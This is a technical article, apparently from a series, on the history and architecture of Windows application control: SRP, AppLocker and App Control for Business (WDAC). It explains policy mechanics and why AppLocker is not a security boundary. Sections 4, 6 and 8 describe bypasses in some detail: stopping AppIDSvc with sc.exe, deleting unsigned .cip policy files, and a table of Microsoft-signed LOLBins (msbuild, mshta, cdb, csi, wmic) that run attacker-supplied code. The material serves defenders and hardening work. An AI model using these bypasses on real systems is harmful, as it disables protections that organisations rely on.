But SRP's management surface was a series of footguns. There were no per-user rules. There was no audit-only mode -- you authored a rule and immediately enforced it. There was no PowerShell module; configuration was an MMC snap-in click path. And the Internet-Zone rule was structurally narrow: it applied only to Windows Installer (.msi) packages and keyed off the source zone Windows Installer computed at install time, so it never covered the .exe and script payloads that mattered most.The Zone.Identifier ADS is also silently stripped by FAT and exFAT copies, by many archive formats during extraction, and by any process that rewrites the file. SRP's zone rule was therefore reliable only against the most casual download paths -- exactly the threat model SRP claimed to address. The structural reason AppLocker dropped Internet Zone as a rule condition in 2009 starts here.

SRP is genealogy, not subject matter, for the rest of this article. Microsoft never formally deprecated it, but practitioners abandoned it within a year of AppLocker's 2009 release, and Microsoft Learn now points anyone arriving at the SRP page toward AppLocker or App Control. The three operational defects -- no per-user, no audit, no PowerShell -- sketch the brief that the AppLocker team would inherit. What did Microsoft actually ship in 2009, and where did its designers draw the line between manageability and security?

flowchart TD SRP["2001 -- Software Restriction Policies
(Windows XP RTM)
user-mode SAFER API"] AL["2009 -- AppLocker
(Windows 7 / Server 2008 R2)
user-mode AppIDSvc + AppID.sys minifilter"] CCI["2015 -- Configurable Code Integrity
(Windows 10 1507, under Device Guard umbrella)
kernel ci.dll"] WDAC["2017 -- Windows Defender Application Control
(Windows 10 1709)
same kernel ci.dll, new brand"] ACfB["2024 -- App Control for Business
(Windows 11 24H2 / Server 2025)
same kernel ci.dll, third brand"] Now["2026 -- both AppLocker and App Control for Business ship in the same SKU"] SRP -- effectively orphaned --> AL AL -- peer mechanism added, not replaced --> CCI CCI -- renamed --> WDAC WDAC -- renamed --> ACfB AL -- still ships --> Now ACfB -- still ships --> Now

3. AppLocker (2009) -- The Architecture Microsoft Documents

October 22, 2009. AppLocker ships in Windows 7 Enterprise / Ultimate and in Windows Server 2008 R2 [@ms-lifecycle-windows7] [@ms-lifecycle-server-2008-r2]. What did Microsoft actually build, exactly as Microsoft Learn documents it?

Five rule collections [@ms-applocker-rules]:

Executable -- .exe, .com
DLL -- .dll, .ocx (off by default; opt-in for performance reasons)
Script -- .ps1, .vbs, .js, .bat, .cmd
Windows Installer -- .msi, .msp, .mst
Packaged App -- .appx, .msix

The script collection's inclusion of .bat and .cmd is a coverage detail that survives into 2026 as one of the few capabilities AppLocker has and App Control does not [@ms-appcontrol-feature-availability]. Hold that thought; it returns in section 10.

Three rule conditions:

Publisher -- the Authenticode subject name, product name, file name, and minimum file version. The load-bearing usability win over SRP: a single Publisher rule for "binaries signed by Microsoft Corporation with product Office, version 16.0 or higher" survives every patch the vendor ships.
Path -- with environment-variable and wildcard support (%ProgramFiles%\Contoso\*.exe).
File Hash -- the SHA-256 of the binary. Stable but brittle; one update breaks the rule.

An AppLocker (or App Control) rule that allows or denies execution based on the Authenticode signer subject, the file's signed metadata (Original Filename, Product Name), and an optional minimum version. The publisher gate trusts the certificate authority's binding of signer name to private key; it does not evaluate what the signed code will do at runtime. The structural limit of any publisher-gate allowlist is that signed code can be made to load and execute attacker-controlled data -- this is what the Microsoft Recommended Block Rules in section 8 enumerate.

AppLocker also added the three management capabilities SRP lacked: per-user / per-group rule assignment via the AppLocker PowerShell module (Get-AppLockerPolicy, Set-AppLockerPolicy, Test-AppLockerPolicy, New-AppLockerPolicy), audit-only mode that logs would-be denials without enforcing them, and a real GPO editor experience under Security Settings. The per-user capability is still, in 2026, the operational reason AppLocker has not gone away [@ms-appcontrol-feature-availability]; we will return to that in section 11.

The architecture is the part most readers underestimate. AppLocker is a kernel-mode minifilter that asks a user-mode service for the verdict. Microsoft's AppLocker Architecture and Components page documents the user-mode side at the service-and-callback level [@ms-applocker-architecture]: the policy decision is deferred to the user-mode Application Identity service (AppIDSvc) running as LocalService, which evaluates policy via SeAccessCheckWithSecurityAttributes or AuthzAccessCheck against the calling user's group memberships, with interception points at process create, DLL load, and script run. The kernel-side component is the AppId.sys minifilter shipped in %SystemRoot%\System32\drivers\; it issues the callbacks at process creation, optional DLL load, script-host invocation, MSI execution, and packaged-app activation, and the kernel honours the verdict the service returns.

The Windows service that evaluates AppLocker rules. Runs as `LocalService` under a service host process. The kernel minifilter `AppID.sys` collects the candidate file's metadata at the relevant lifecycle hook (process create, image load, script host start) and waits for `AppIDSvc` to return an access decision derived from the active AppLocker policy and the calling user's token. Stopping `AppIDSvc` stops AppLocker enforcement -- this is the architectural fact the next section turns on. sequenceDiagram participant U as User participant K as Kernel (CreateProcess) participant Min as AppID.sys minifilter participant Svc as AppIDSvc (user mode) participant Pol as Active AppLocker policy U->>K: CreateProcess foo.exe K->>Min: process-create callback Min->>Svc: query verdict for foo.exe and caller token Svc->>Pol: AuthzAccessCheck against publisher / path / hash rules Pol-->>Svc: allow or deny Svc-->>Min: verdict Min-->>K: honour verdict K-->>U: process starts or STATUS_ACCESS_DENIED

The five-by-three matrix below is the policy surface a practitioner authors against:

Collection / Condition	Publisher	Path	File Hash
Executable (`.exe`, `.com`)	yes	yes	yes
DLL (`.dll`, `.ocx`)	yes	yes	yes
Script (`.ps1`, `.vbs`, `.js`, `.bat`, `.cmd`)	yes	yes	yes
Windows Installer (`.msi`, `.msp`, `.mst`)	yes	yes	yes
Packaged App (`.appx`, `.msix`)	yes (publisher only)	no	no

The DLL collection is off by default for a reason Microsoft Learn warns about plainly [@ms-applocker-rules]: "When DLL rules are used, AppLocker must check each DLL that an application loads. Therefore, users may experience a reduction in performance if DLL rules are used." That cost is paid for every load of every DLL by every running process; on a workstation that loads thousands of DLLs at boot it is observable in startup time. The Packaged App collection is publisher-only because the Universal Windows Platform packaging format always carries an Authenticode signature.

Note: The most common misattribution in the AppLocker literature is the conflation of AaronLocker with the AppLocker bypass corpus. AaronLocker [@github-aaronlocker] is Aaron Margosis's deployment tool -- a PowerShell-based generator that authors thorough audit and enforce policies. The canonical AppLocker bypass catalogue is Oddvar Moe's UltimateAppLockerByPassList [@github-ultimateapplockerbypass]. The canonical App Control bypass catalogue is Jimmy Bayne's UltimateWDACBypassList [@github-ultimatewdacbypass]. Three different artefacts, three different authors, three different purposes.

AppLocker's design is admirable. It fixed every operational defect of SRP, it shipped per-user rules a decade before App Control's kernel evaluator caught up, and its PowerShell module is still the most ergonomic Windows application-control authoring surface in 2026. But notice one thing about that sequence diagram: the policy decision lives in a user-mode service. What happens to enforcement if the attacker is running as SYSTEM?

4. AppLocker's Structural Limit -- Why It Was Never a Security Boundary

A single PowerShell line. sc.exe stop AppIDSvc from a LocalSystem context -- the canonical first-step bypass catalogued in UltimateAppLockerByPassList [@github-ultimateapplockerbypass] and reproduced in Oddvar Moe's December 2017 case study [@oddvarmoe-applocker-case-study; @oddvarmoe-applocker-case-study-part2]. Enforcement degrades until the next reboot. Is that a bug?

It is not. It is the design. And three converging pieces of evidence -- Microsoft's own words, the documented architecture, and the public bypass record -- agree on the scope.

1. Microsoft's own servicing-criteria language. The App Control and AppLocker Overview page says, verbatim [@ms-appcontrol-applocker-overview]: "AppLocker helps to prevent end-users from running unapproved software on their computers, but it doesn't meet the servicing criteria for being a security feature." The MSRC Windows Security Servicing Criteria document [@msrc-servicing-criteria] is the rule the MSRC uses to decide whether a defect in a Windows feature qualifies for a CVE. Defects in a security boundary receive CVEs and a coordinated patch. Defects in a defense-in-depth feature may not -- they are documented and, when convenient, fixed, but Microsoft does not promise that every bypass will be treated as a vulnerability. AppLocker is the second category. App Control, when configured to qualify, is the first.

2. The user-mode AppIDSvc architecture is the proximate reason. Restate the section-3 diagram: the kernel minifilter AppID.sys collects the file metadata, but the verdict is returned by AppIDSvc running in user mode as LocalService. Any process running as LocalSystem or with administrator privilege can stop AppIDSvc. Stopping the service does not just bypass a rule; it removes the evaluator that the kernel was waiting for. The Microsoft Learn architecture page describes the evaluation surface explicitly [@ms-applocker-architecture]: "AppLocker policies are conditional access control entries (ACEs), and policies are evaluated by using the attribute-based access control SeAccessCheckWithSecurityAttributes or AuthzAccessCheck functions." AuthzAccessCheck is a user-mode Authz API; the evaluation chain ends in a process that an admin can stop.

The MSRC servicing criteria classify Windows features into *security boundaries* (a violation produces a CVE, fixes are released on Patch Tuesday or out-of-band), *security features* designed against a defined threat model (violations may or may not get CVEs depending on the threat model), and *defense-in-depth* measures (no servicing commitment beyond best effort). AppLocker is explicitly placed in the third class on the *App Control and AppLocker Overview* page [@ms-appcontrol-applocker-overview]. App Control with a signed policy and HVCI on is treated as a security feature whose threat model includes an admin-equivalent attacker -- and that is the precise condition under which an App Control bypass is treated as a CVE-class defect.

3. The published bypass corpora. Oddvar Moe's UltimateAppLockerByPassList [@github-ultimateapplockerbypass] catalogues rundll32.exe, regsvr32.exe, mshta.exe, installutil.exe, msbuild.exe, and a long list of others, each documented to bypass the default AppLocker rule set without administrator privileges. Moe's December 2017 case study [@oddvarmoe-applocker-case-study] paired a defined test environment (Windows 10 1703 Enterprise with the default AppLocker rules applied and no third-party software) against a defined adversary capability (an unprivileged interactive user) and demonstrated fourteen distinct bypass techniques. That made "AppLocker is bypassable in practice without admin" an empirical claim, not a theoretical one.

And -- this is the part that closes the argument -- the Microsoft-org-hosted AaronLocker README [@github-aaronlocker] states the same scope plainly: "AaronLocker does not try to stop administrative users from running anything they want -- and application control solutions cannot meaningfully restrict administrative actions anyway. A determined user with administrative rights can bypass any application control solution." The bypass community and the Microsoft-employee-maintained deployment baseline agree.

This is the article's first reorientation. The convergence of the Microsoft servicing-criteria language, the kernel-defers-to-user-mode architecture, and the published bypass record is not three independent observations; it is one observation viewed from three angles. AppLocker is a hygiene control. The bypassability against an admin-equivalent attacker is a scope statement, not a defect. The misconception that AppLocker was ever supposed to defend against an attacker with SYSTEM lives in the reader, not in the product.

The three pieces of evidence, tabulated:

Evidence	Source	What it establishes
MSRC servicing-criteria language	Microsoft Learn App Control and AppLocker Overview [@ms-appcontrol-applocker-overview]	AppLocker is not a security feature under MSRC criteria
User-mode `AppIDSvc` architecture	Microsoft Learn AppLocker Architecture and Components [@ms-applocker-architecture]	A `LocalSystem` or admin attacker can stop the evaluator
Public bypass corpora	Oddvar Moe `UltimateAppLockerByPassList` [@github-ultimateapplockerbypass]; Moe 2017 case study [@oddvarmoe-applocker-case-study]	Demonstrated bypasses without admin against default rules
Microsoft-org-hosted deployment baseline	AaronLocker README, Aaron Margosis [@github-aaronlocker]	Microsoft-employee-maintained tool states the scope identically

{` // Pseudocode walk of what happens when an admin or LocalSystem process // stops AppIDSvc. The actual demonstration requires admin on a Windows // host; this is the logic the kernel minifilter follows.

function onProcessCreate(candidateExe, callerToken) { const svc = queryService('AppIDSvc'); if (svc.state !== 'Running') { // No evaluator. The minifilter cannot block on the verdict // because the verdict source is gone. Enforcement degrades. return ALLOW; } const verdict = svc.evaluate(candidateExe, callerToken); return verdict; // honoured by the kernel as ALLOW or DENY }

// After: sc.exe stop AppIDSvc (requires admin / SYSTEM) // queryService('AppIDSvc').state === 'Stopped' // onProcessCreate(...) returns ALLOW for every candidate // until AppIDSvc restarts (typically next reboot) `}

Note: AppLocker prevents non-admin end users from running unapproved software. That is the entire mission statement, and Microsoft says it directly. It is not a weakness of AppLocker that an attacker with administrative rights can bypass it; that is outside the threat model the product was designed against. The right question to ask of AppLocker is not "is it secure?" but "is the threat model it addresses the threat model I need to address?"

If AppLocker cannot defend against an admin-equivalent attacker by design, and that became obvious inside Microsoft by the early 2010s, the question is no longer "why is AppLocker not enough?" It is: what would a Windows application-control system designed against an admin-equivalent attacker actually look like? Microsoft answered that question with Windows 10.

5. The Generational Pivot -- Configurable Code Integrity, WDAC, App Control for Business

With Windows 10, Microsoft introduces Device Guard. The framing in the official October 2017 retrospective is unusually candid for a Microsoft product communication: "With Windows 10 we introduced Windows Defender Device Guard" -- and the new mechanism's value proposition, the retrospective explains, is that its enforcement does not depend on a user-mode service an administrator can turn off [@ms-blog-introducing-wdac-2017]. Where AppLocker's AppIDSvc evaluator can be stopped from a LocalSystem shell, the new mechanism's evaluator lives in the kernel and validates its policy file cryptographically. Microsoft was not hiding what changed. Microsoft was announcing what changed.

The 2014-2015 threat-model shift inside Microsoft is well documented in retrospect [@ms-blog-introducing-wdac-2017]. Post-Pass-the-Hash, post-APT, the working assumption was that the adversary reaches administrator quickly -- and that any control whose enforcement could be turned off by an administrator was therefore not, in itself, a defense against the modern adversary. AppLocker could not be retrofitted to defend against that model because its evaluator lives in user mode by design. The fix was structural: build a peer mechanism in the kernel Code Integrity component.

The Windows kernel component that enforces signature and policy checks on every image loaded into memory. The same `ci.dll` enforces driver signing (KMCS) and Driver Signature Enforcement (DSE); the App Control for Business policy is a peer of the driver signing policy, evaluated by the same kernel code at the same hook points. There is no service to stop because there is no service -- the evaluator runs in the kernel itself. The umbrella brand Microsoft used in 2015-2017 for a bundle of hardware-rooted security features that included HVCI and Configurable Code Integrity. The brand was retired because customers consistently believed the bundle required hardware that, in fact, only HVCI required. The configurable CI policy that was the application-control half of Device Guard is what Microsoft now calls App Control for Business [@ms-blog-introducing-wdac-2017]. The configuration in which the kernel CI evaluator runs inside a Virtualization-Based Security (VBS) enclave at Virtual Trust Level 1 (VTL1), separated from the normal kernel at VTL0 by the Windows hypervisor. The marketing name in Windows 11 Settings is *memory integrity* [@ms-hvci] [@ms-support-memory-integrity]. The companion HVCI article in this pipeline covers the mechanism in depth; for this article the relevant fact is that with HVCI on, even a kernel-mode attacker in VTL0 cannot tamper with the code-integrity decision.

The connecting insight that made the architecture work: do not fix AppLocker. Build a peer mechanism in ci.dll, the same component that already enforces driver signing, and make the new application-control policy a peer of the driver-signing policy. The decision lives in the kernel. The policy file lives on disk under %SystemRoot%\System32\CodeIntegrity\CiPolicies\Active\. There is no user-mode service to stop.

The three-era naming timeline is the question every practitioner asks first about this product, so it is worth laying out cleanly:

Era	Name	Released	Source
Launch	Configurable Code Integrity, under the Device Guard umbrella	Windows 10 1507, July 29 2015	[@ms-blog-introducing-wdac-2017]
Rename 1	Windows Defender Application Control (WDAC)	Windows 10 1709 (Fall Creators Update GA October 17, 2017; WDAC rename announced October 23, 2017)	[@ms-blog-introducing-wdac-2017]
Rename 2	App Control for Business	Windows 11 24H2 / Server 2025, autumn 2024 [@ms-lifecycle-win11-enterprise] [@ms-lifecycle-server-2025]	[@ms-appcontrol-applocker-overview] [@github-wdac-toolkit-issue-411]

Microsoft's October 2017 retrospective is the cleanest explanation of the first rename [@ms-blog-introducing-wdac-2017]: the Device Guard umbrella *"unintentionally left an impression for many customers that the two features were inexorably linked and could not be deployed separately"* -- which Configurable CI and HVCI never were. The rename to WDAC was brand management, not a technology change. The 2024 rename to App Control for Business [@ms-appcontrol-applocker-overview] is similarly a rebrand; Microsoft Learn states *"App Control for Business was originally released as part of Device Guard and called configurable code integrity. The terms 'Device Guard' and 'configurable code integrity' are no longer used with App Control except when deploying policies through Group Policy."* The same kernel code path has worn three names in nine years.

The naming convention this article uses: lead with "App Control for Business (still widely called WDAC)" on first mention, then use the names interchangeably. The community search term "WDAC" stays in the title and tags because most practitioner content still uses it.

flowchart TD Kernel["Kernel CI evaluator (ci.dll)
peer of driver signing / DSE / KMCS
unchanged 2015 -- 2026"] Brand1["Configurable Code Integrity
under Device Guard umbrella
(Windows 10 1507, 2015)"] Brand2["Windows Defender Application Control (WDAC)
(Windows 10 1709, 2017)"] Brand3["App Control for Business
(Windows 11 24H2 / Server 2025, 2024)"] Brand1 --> Kernel Brand2 --> Kernel Brand3 --> Kernel

Note: In 2026, "WDAC" remains the more discoverable community-search term for the kernel CI policy mechanism. Microsoft Learn redirects from the old windows-defender-application-control/ URL path to the new app-control-for-business/ path, but third-party blogs, conference talks, and the bypass corpora all still use "WDAC". If you are searching, use both terms.

A peer mechanism in the kernel CI component is a deliberate, specific architectural choice. What does App Control for Business actually check at policy-evaluation time, and what makes its policy itself tamper-resistant against a SYSTEM-equivalent attacker?

6. The Mechanism in Detail -- How App Control for Business Actually Enforces

A LoadImage callback enters the kernel. Where does the policy decision happen, who reads the policy file, and what stops the attacker from just deleting or replacing the policy file?

Where it runs. Inside ci.dll, loaded by the Windows kernel. The same component that enforces driver signing / DSE / KMCS [@ms-hvci]. The callback path is the documented kernel API surface: PsSetLoadImageNotifyRoutine [@ms-pssetloadimagenotifyroutine] registers the image-load callback, and PsLookupProcessByProcessId [@ms-pslookupprocessbyprocessid] resolves the loading PID to an EPROCESS so the evaluator can attribute the load to the right process. A user-mode sc.exe stop has no effect because there is no service to stop. The evaluator is the kernel.

What it evaluates. For each candidate image, ci.dll checks:

The file's Authenticode signature -- signer subject, EKU (Extended Key Usage), leaf certificate attributes.
The file's signed metadata -- Original Filename, version, product name (analogous to AppLocker's Publisher rule).
SHA-1, SHA-256, and page hashes of the file content.
The file's path, introduced in Windows 10 1903, with a mandatory runtime user-writeability check that distinguishes App Control path rules from AppLocker's [@github-aaronlocker-script]. An App Control path rule that resolves to a directory writable by a non-administrator is rejected at evaluation time.
The file's Managed Installer lineage -- whether the file was written by a process tagged as a managed installer [@ms-appcontrol-managed-installer].
The file's ISG reputation -- covered in section 7 [@ms-appcontrol-isg].

The XML / binary `.cip` policy file that `ci.dll` consults at every image-load callback. Authored in XML via the `New-CIPolicy` and `Merge-CIPolicy` cmdlets (the `ConfigCI` PowerShell module) and compiled to a binary `.cip` via `ConvertFrom-CIPolicy`. The kernel reads the active policies from `%SystemRoot%\System32\CodeIntegrity\CiPolicies\Active\*.cip` at boot and on policy refresh. A trust-propagation feature in App Control. An administrator designates a process (typically a configuration-management agent such as Configuration Manager, Intune, or a third-party tool such as Patch My PC) as a *managed installer*. Any file written by that process is automatically tagged with an Extended Attribute marking it as installed by trusted infrastructure. App Control policy can then allow files bearing the tag. The Managed Installer rule collection is implemented as an AppLocker rule set [@ms-appcontrol-managed-installer], which is the most-cited example of AppLocker enforcement plumbing being reused by App Control rather than replaced.

Policy file format. XML in, binary in the kernel. The cmdlet sequence:

New-CIPolicy   -> Merge-CIPolicy -> ConvertFrom-CIPolicy -> .cip file -> drop into Active/ -> reboot or refresh

The PowerShell module that exposes these cmdlets is still partly named after the WDAC era. ConvertFrom-CIPolicy, Set-CIPolicySetting, Set-CIPolicyVersion, Add-SignerRule, and the rest all retain the CIPolicy / ConfigCI naming through the 2024 rebrand. Microsoft has not renamed the cmdlets to App Control for Business. The App Control Wizard [@ms-appcontrol-wizard] is an open-source MSIX-packaged C# tool that uses these same cmdlets under the hood.

Signed vs unsigned policies -- the load-bearing distinction. This is the single most common practitioner confusion in App Control deployments, and it is worth several paragraphs of care.

An unsigned App Control policy is fully supported and widely deployed. The policy XML is authored, compiled, and dropped into the active-policies directory. The kernel reads it and enforces it. But the policy file itself has no cryptographic binding to the device. Any process with write access to %SystemRoot%\System32\CodeIntegrity\CiPolicies\Active\ -- which includes anything running as SYSTEM or administrator -- can simply del the .cip file and reboot. Enforcement vanishes. The defect is not in ci.dll; it is in the policy not being signed.

A signed App Control policy is signed by the deploying organisation's code-signing certificate -- not by the application publisher's certificate, which is the misconception most often imported from the AppLocker mental model. The deploying organisation typically uses an internal PKI leaf, the signing private key kept on a hardware token or in a sealed key vault. When the policy is signed, the kernel CI evaluator validates the signature against the trusted signer set baked into the policy at first application; a subsequent attempt to remove or replace the .cip file is rejected at boot because the unsigned (or alternately-signed) replacement does not match. Even SYSTEM cannot bypass this without the corresponding private key. This is the only configuration that survives an admin-equivalent attacker.

App Control policies are signed by the deploying organisation's code-signing certificate, *not* by the application publisher's. The signed policy is bound to the device such that even `SYSTEM` cannot remove or replace it without the organisation's signing key.

Dimension	Unsigned policy	Signed policy
Tamper-resistance against `SYSTEM` / admin	None -- the `.cip` file can be deleted	Strong -- removal requires the signing key
Deployment complexity	Low -- copy file and reboot	High -- requires PKI, signing infra, key custody
Signing PKI requirement	None	Internal code-signing CA leaf required
Removal mechanism	`del *.cip` + reboot	Sign and deploy a replace policy with the same key
Suitable as MSRC security boundary	No	Yes (with HVCI on)

HVCI integration. When Virtualization-Based Security is on, the kernel CI evaluator itself runs in VTL1 inside HVCI (memory integrity, in Windows 11 Settings) [@ms-hvci] [@ms-support-memory-integrity]. A kernel-mode attacker in VTL0 -- even one who has loaded an arbitrary kernel driver and corrupted kernel memory at will -- cannot tamper with the code-integrity evaluation path. The decision lives behind the hypervisor boundary.

Virtual Trust Levels exposed by the Windows hypervisor. VTL0 is the normal Windows kernel and user mode. VTL1 is the *secure kernel*, an isolated execution environment with restricted memory access and a tighter trust model. With HVCI enabled, the code-integrity evaluator runs in VTL1; a kernel-mode attacker confined to VTL0 cannot read or write VTL1 memory directly. Companion HVCI article in this pipeline covers the VTL model in depth. sequenceDiagram participant P as Loading process participant K as Kernel image loader participant CI as ci.dll (CI evaluator) participant Pol as Active .cip policies P->>K: load module foo.dll K->>CI: PsSetLoadImageNotifyRoutine callback CI->>CI: parse Authenticode + compute hashes + check path CI->>Pol: match against signer / hash / path / MI / ISG rules Pol-->>CI: allow or deny CI-->>K: honour verdict K-->>P: image loaded or STATUS_INVALID_IMAGE_HASH flowchart LR subgraph VTL0["VTL0 -- normal Windows kernel"] K0["NTOS kernel"] Drv["Loaded drivers"] Att["kernel-mode attacker"] end subgraph VTL1["VTL1 -- secure kernel"] SK["Secure kernel"] CIeval["ci.dll evaluator"] end Hyper["Windows Hypervisor (VBS)"] K0 -- regulated calls --> Hyper Hyper -- mediated entry --> SK SK --> CIeval Att -. blocked .- Hyper

Multi-policy support. From Windows 10 1903 (May 2019) the kernel supported up to 32 active App Control policies whose interactions follow two distinct rules: multiple base policies intersect (an app must be allowed by every base policy that applies), while a base policy and its supplemental policies union (an app is allowed if any of them allow it), and deny rules always win in either combination. The cap was lifted by the April 9, 2024 cumulative security updates: KB5036893 for Windows 11 22H2 and 23H2 (OS Builds 22621.3447 and 22631.3447) [@ms-kb-5036893], and KB5036892 for Windows 10 21H2 and 22H2 (OS Builds 19044.4291 and 19045.4291) [@ms-kb-5036892]. Microsoft's Deploy multiple App Control for Business policies page is explicit on the version scope [@ms-appcontrol-multi-policy]: "The policy limit was not removed on Windows 11 21H2 and will remain limited to 32 policies." No published Microsoft documentation gives the new ceiling on the platforms where the cap was lifted; the practical limit is policy parsing time at boot.

Note: This is the single most common practitioner misreading in App Control deployments. An unsigned App Control policy enforces against userland and against unprivileged users perfectly well -- but it does not qualify as a security boundary under the MSRC servicing criteria, because an admin or SYSTEM attacker can delete the policy file. The phrase "deploy WDAC" alone is ambiguous; the meaningful phrase is "deploy a signed WDAC policy with HVCI on and the Recommended Block Rules merged in".

Kernel evaluator, signed policy, HVCI-isolated evaluator, multi-policy merge. That is the security boundary Microsoft sells. But none of those facts tells you what signals the policy can act on -- and one of those signals (ISG) is the single most misunderstood piece of the App Control vocabulary.

7. ISG -- The Reputation Signal Everyone Calls a List

Open any practitioner thread about App Control in 2024-2026 and you will see the phrase "the ISG list of trusted apps." There is no such list. Microsoft has said so for years. The misconception is institutional.

The verbatim Microsoft Learn quote, from the Use App Control with the Intelligent Security Graph page [@ms-appcontrol-isg]:

The ISG isn't a "list" of apps. Rather, it uses the same vast security intelligence and machine learning analytics that power Microsoft Defender SmartScreen and Microsoft Defender Antivirus to help classify applications as having "known good," "known bad," or "unknown" reputation. This cloud-based AI is based on trillions of signals collected from Windows endpoints and other data sources, and processed every 24 hours.

The ISG isn't a 'list' of apps. -- Microsoft Learn, *Use App Control with the Intelligent Security Graph* [@ms-appcontrol-isg]

ISG is a reputation classifier. An App Control policy can be configured to treat ISG's "known good" verdict as an additive allow signal. ISG never blocks on App Control's behalf. The Microsoft Learn page is precise: "the ISG option only allows binaries that are known good. If a binary is unknown or known bad, it won't be allowed by the ISG" [@ms-appcontrol-isg]. The classifier sits underneath the policy's explicit rules; it does not override them.

A Microsoft cloud service that ingests telemetry from Defender SmartScreen, Defender Antivirus, and partner products and produces a reputation classification for individual binaries. The classifier returns one of *known good*, *known bad*, or *unknown*. App Control can be configured to treat *known good* as an additional allow path, in addition to the explicit signer / hash / path / Managed Installer rules in the policy. ISG never *blocks* on its own; *unknown* and *known bad* simply mean ISG does not vote allow [@ms-appcontrol-isg].

The mechanism. When ISG is enabled and a binary is classified known good, Windows tags the file with an Extended Attribute named $KERNEL.SMARTLOCKER.ORIGINCLAIM, so the CI evaluator can honour the verdict at subsequent image loads without a fresh cloud call. The cloud reputation model itself is processed every 24 hours [@ms-appcontrol-isg]; App Control's client-side requeries are documented only as periodic, without a fixed interval. The policy option Enabled:Invalidate EAs on Reboot discards the tags across reboot, forcing a re-evaluation.

The extended attribute \$KERNEL.SMARTLOCKER.ORIGINCLAIM is the same EA-tag mechanism the Managed Installer feature uses to propagate the "installed by trusted infrastructure" signal [@ms-appcontrol-managed-installer]. Two adjacent App Control features therefore share the same persistence layer -- one populated by a local trusted-process designation, the other populated by a cloud reputation classifier. The kernel evaluator does not care which source wrote the tag.

The misconception this section closes is that ISG is a list of curated allowed apps -- a corporate-managed allowlist administered by Microsoft. It is not. The original 00-input.md for this article framed ISG as "cloud-reputation-driven allow-listing", which is half-true in spirit and wrong in mechanism. ISG is reputation. The allowlist is what the App Control policy still has to author explicitly.

Note: The phrase Intelligent Trusted List and the acronym ITL surface periodically in AI summaries and in third-party blog posts that describe App Control features. No such Microsoft feature exists. A search of Microsoft Learn produces zero results; the URLs cited by AI summaries return 404; and the definitions offered by AI summaries contradict each other. The closest real Microsoft features are ISG (this section), the Microsoft Recommended Block Rules (section 8), and Smart App Control (section 9). If you see ITL in a security blog, treat it as a fabrication and ignore it.

ISG turns an App Control policy into a hybrid: explicit rules plus a reputation tap. But it is still an allowlist, and an allowlist has a structural ceiling. Microsoft itself published the consequence as a block list. Why?

8. The Bypass Reality -- Recommended Block Rules and the LOLBin Corpus

Microsoft's own Microsoft Learn page lists approximately forty Microsoft-signed binaries that can bypass an App Control allow rule on themselves. The page is called Applications that can bypass App Control and how to block them [@ms-appcontrol-bypass]. Why does Microsoft publish a list of its own bypassable signed binaries?

Because if your App Control policy says "allow Microsoft-signed code", then it admits each of those forty binaries -- and each one is a way to run attacker-supplied code while complying with the policy. The publisher gate cannot evaluate side effects.

A binary already present on the operating system, typically signed by the OS vendor, that an attacker can repurpose to perform actions a security control would otherwise block. The canonical Windows LOLBin classes are script interpreters bundled with the OS or runtime (`mshta.exe`, `wscript.exe`), build tools that compile and execute attacker-supplied source (`msbuild.exe`, `csi.exe`, `dotnet.exe`), debuggers that script their own target (`cdb.exe`, `windbg.exe`), and registration utilities that load arbitrary DLLs into a signed host (`regsvr32.exe`, `rundll32.exe`). The community-curated LOLBAS Project [@lolbas-project] catalogues hundreds.

The named-researcher chain that drove the Recommended Block Rules is a who-is-who of mid-2010s Windows offensive research:

cdb.exe -- Matt Graeber, August 2016, preserved in the Wayback Machine [@exploit-monday-cdb-wayback]. The Windows debugger ships signed by Microsoft and includes a scripting facility that runs arbitrary shellcode in memory. Graeber's blog post asked, in his own words, "what is a tool that's signed by Microsoft that will execute code, preferably in memory?" and answered "WinDbg/CDB of course!"
csi.exe -- Casey Smith, September 2016, preserved in the Wayback Machine [@subt0x10-csi-wayback]. The C# interactive compiler, distributed with Visual Studio, is signed by Microsoft and runs arbitrary C# fragments via Assembly.Load().
dnx.exe -- Matt Nelson, November 2016 [@enigma0x3-dnx-2016]. The early .NET Core host that loads and executes arbitrary .NET assemblies under a signed Microsoft binary.
addinprocess.exe / addinprocess32.exe -- James Forshaw, July 2017 [@tiraniddo-dg-2017]. The Visual Studio add-in host that can be coerced into loading an attacker DLL while the parent process satisfies the signed-publisher policy.
dotnet.exe -- Jimmy Bayne, August 2019 [@bohops-dotnet-awl]. The shipping .NET host with the same fundamental capability as dnx.exe but with a 2019-vintage attack surface and a live PoC against both AppLocker and WDAC.

The operational entries practitioners encounter most often are msbuild.exe (the C# / MSBuild compiler that can execute inline build tasks), mshta.exe (the HTML application host), wmic.exe (which can load XSL stylesheets that execute arbitrary script), wscript.exe (Windows Script Host), and bash.exe / wsl.exe (the WSL launchers, which provide an entirely separate execution environment outside the policy's reach).

Binary	Capability that enables the bypass	Original researcher	Source
`cdb.exe`	Debugger scripting facility executes shellcode in memory	Matt Graeber, Aug 2016	[@exploit-monday-cdb-wayback]
`csi.exe`	C# interactive compiler, `Assembly.Load()` over arbitrary C#	Casey Smith, Sep 2016	[@subt0x10-csi-wayback]
`dnx.exe`	Early .NET Core host, loads arbitrary assemblies	Matt Nelson, Nov 2016	[@enigma0x3-dnx-2016]
`addinprocess.exe`	Visual Studio add-in host loads attacker DLL	James Forshaw, Jul 2017	[@tiraniddo-dg-2017]
`dotnet.exe`	Modern .NET host, AWL bypass via assembly loading	Jimmy Bayne, Aug 2019	[@bohops-dotnet-awl]
`msbuild.exe`	Inline `Task` in build XML compiles and runs C# at build time	community	[@ms-appcontrol-bypass]
`mshta.exe`	HTA host evaluates VBScript / JScript	community	[@ms-appcontrol-bypass]
`wmic.exe`	XSL stylesheet evaluation runs arbitrary script	community	[@ms-appcontrol-bypass]
`bash.exe` / `wsl.exe`	Launches WSL kernel, an environment outside App Control	community	[@ms-appcontrol-bypass]

The structural limit being demonstrated. A publisher-gate allowlist cannot evaluate what a signed binary will do after it starts. If the policy allows Microsoft-signed code, it has no way to know that msbuild.exe will compile and execute attacker-supplied C# at runtime. The same kind of structural ceiling that applied to AppLocker's user-mode evaluator applies to App Control's publisher gate. Different mechanism, different layer; same kind of structural ceiling.

flowchart LR A["Signed binary loads"] --> B["Policy admits publisher"] B --> C["Binary starts"] C --> D["Binary reads attacker-controlled input"] D --> E["Attacker-controlled code runs"] note["No policy-time check can prevent this"] E -. observed by .- note

